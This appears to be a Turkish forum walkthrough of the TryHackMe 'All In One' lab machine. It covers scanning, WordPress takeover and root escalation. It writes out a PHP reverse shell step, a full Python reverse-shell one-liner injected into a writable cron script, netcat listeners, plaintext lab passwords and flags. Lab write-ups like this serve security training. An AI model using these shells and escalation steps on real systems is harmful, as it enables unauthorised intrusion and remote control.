|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)            
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)      
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                  
|_http-server-header: Apache/2.4.29 (Ubuntu)                        
|_http-title: Apache2 Ubuntu Default Page: It works                  
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel            
                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

Makine ip adresini adres çubuğuna yazarak websitesine giriş yapıyorum, beni default bir apache sayfası karşıladı, sayfanın kaynak kodlarına baktığımda herhangi bir ipucu bulmadım, gobuster toolunu kullanarak sitenin dizinlerini taratıyorum.

Kod:

root@kali:gobuster dir -u http://10.10.52.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.170
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/27 15:44:13 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
/server-status (Status: 403)

/hackathons dizinine giriyorum, sayfada "kahretsin sirke kokusundan ne kadar nefret ediyorum" yazıyor sayfa kaynak kodunu inceliyorum. Kaynak kodda, Keep Going anahtarı ile Vigenere kullanarak şifreyi çözebileceğimizi anlıyorum.

Encrypted : Dvc W@iyur@123
Key: KeepGoing
Decrypted : Try H@ckme@123

Diğer gizli dizinimiz ise /worpress dizine giriş yaptığımda yeni kurulmuş bir wordpress ile karşılaşıyorum, hemen WPScan toolunu kullanarak wordpressi analiz ediyorum.

Kod:

root@kali:~# wpscan --url 10.10.52.170/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.52.170/wordpress/ [10.10.52.170]
[+] Started: Tue Aug 17 10:28:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.52.170/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.52.170/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.52.170/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.52.170/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.52.170/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.52.170/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reflex-gallery
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 17 10:28:37 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 636 B
[+] Data Received: 1.074 KB
[+] Memory used: 203.102 MB
[+] Elapsed time: 00:00:03

Tarama sonucunda elyana isimli bir kullanıcının varlığını öğrenmiş oldum. Try H@ckme@123 parolasıyla elyana olarak wordpress de oturum açmayı denedim ancak başarısız oldum. Daha sonra H@ckme@123 parolasını denedim ve işe yaradı.

Şimdi yönetici olduğumuza göre şablonun 404.php sayfasını düzenleyerek reverse shell alalım. Php Reverse Shelli 404.php sayfamıza yapıştırıyorum bizden değiştirmemizi istediği bilgileri değiştiriyorum.

Terminale nc -lvnp port yazarak gelen istekleri dinlemeye başlıyorum, 404.php sayfasına gidiyorum ve reverse shelli başarıyla almış oluyorum.

user.txt dosyasını elyana'nın ana klasöründe buluyorum, ancak dosyayı okumak için yetkimiz yok.

Kod:

bash-4.4$ cd /home
cd /home
bash-4.4$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2020 .
drwxr-xr-x 24 root   root   4096 Oct  5  2020 ..
drwxr-xr-x  6 elyana elyana 4096 Oct  7  2020 elyana
bash-4.4$ cd elyana
cd elyana
bash-4.4$ ls -la
ls -la
total 48
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
bash-4.4$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

Bize şifrenin sistemde gizlenmiş olabileceğini söyleyen bir ipucu "hint" var.

Kod:

bash-4.4$ cat hint.txt
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

Elyana'nın sistem dosyalarına bakıyorum burada dikkatimi private.txt dosyası çekiyor ve dosyanın içeriğine bakıyorum, dosya içeriğinde elyana kullanıcısının parolasını bize veriyor.

Kod:

bash-4.4$ find / -user elyana -type f 2>/dev/null
find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

Artık elyana'nın şifresine sahip olduğumuza göre, artık doğrudan SSH ile bağlantımızı kurabiliriz.

Kod:

kali@kali:sshpass -p "E@syR18ght" ssh [email protected]
-bash-4.4$ cat user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
-bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d
THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}

Linux ve Unix sistemlerde kullanılan crontab, belirlediğiniz bir zaman yada zaman diliminde belirlediğiniz komut, script yada uygulamanın çalışmasını sağlarsınız. Bende bu yol üzerinden gidip root olmaya çalışacağım.

Kod:

-bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh

Kod:

bash-4.4$ ls -l /var/backups/script.sh
ls -l /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh

Scripti aşağıdaki gibi değiştiriyorum. Bunu yaparken diğer taraftada Netcat ile aşağıdaki belirlediğim portu dinlemeye alıyorum.

Kod:

#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0 ıp adresiniz",istedğiniz port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Kod:

kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}

OKUDUĞUNUZ İÇİN TEŞEKKÜRLER UMARIM YARDIMI DOKUNMUŞTUR.

elinize emeğinize sağlık hocam

TryHackMe | All In One

Pytang

Katılımcı Üye

The Gölge

Saldırı Timleri Emektar

Phoenix.py

Katılımcı Üye

Gladiaus

Katılımcı Üye

The Serum

Katılımcı Üye

darkswan

Katılımcı Üye

Sosyal medya sayfalarımız